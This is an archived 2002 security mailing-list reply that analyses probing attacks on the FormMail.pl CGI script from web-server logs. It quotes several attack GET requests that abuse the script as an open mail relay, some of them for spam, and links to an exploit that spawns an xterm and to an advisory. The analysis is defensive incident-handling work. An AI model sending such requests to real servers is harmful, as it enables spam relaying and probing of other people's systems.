RE: Matt Wright FormMail Attacks

From: Jose Nazario (joseat_private)
Date: Mon Jan 14 2002 - 10:19:28 PST

  • Next message: Brannon: "Re: Matt Wright FormMail Attacks"

    On Mon, 14 Jan 2002, Turner, Keith wrote:
    
    >  My guess is one of the following: 1) Someone looking to send spam
    > through someone else's webserver. (Seems like that would be very
    > inefficient).  2) Someone looking for a new exploit, maybe testing the
    > waters for a new worm. 3) Someone looking for a way to "forge" emails.
    > make it look like it came from an email address of the affected
    > domain.  The email header would go right back to an address in the
    > "forged" domain.
    
    my formail attacks have this general structure:
    
    GET
    /cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t
    
    recipients have been:
    
    c0mikat_private (msg=w00t)
    jersyvipsat_private (again, msg=w00t)
    w00tw00tat_private (yet again, msg=w00t)
    Heyheyremeberme9at_private (msg=w00t)
    GUILTYBIZat_private (msg=w00t)
    
    i don't know if any of those accounts are valid.
    
    those are just in the past 10,000 lines or so from my error logs (i dont
    use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is
    L33T and all), doubtful its just simply spam but rather 'hey, this site's
    got vulnerable cgi-bin stuff'.
    
    spawn an xterm using formmail:
    http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl
    
    view env vars using formmail:
    http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt
    
    but i did find that others have been seeing this same basic pattern:
    
    web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt
    /cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t
    /cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresoneeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
    /cgi-bin/formmail.pl?recipient=rmitchell9601at_private,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordeeat_private&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
    
    http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en
    1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET
    /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t
    HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 ""
    "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"
    
    etc etc ... formmail + w00t on google brings up a bunch. from a few
    more lists, more discussion:
    
    http://ntbugtraq.net/archive/107/244789
    http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html
    
    hope this helps. its a bit older, and not a highly visible item, but its
    real.
    
    ____________________________
    jose nazario						     joseat_private
    	      	     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
    				       PGP key ID 0xFD37F4E5 (pgp.mit.edu)
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Mon Jan 14 2002 - 14:32:00 PST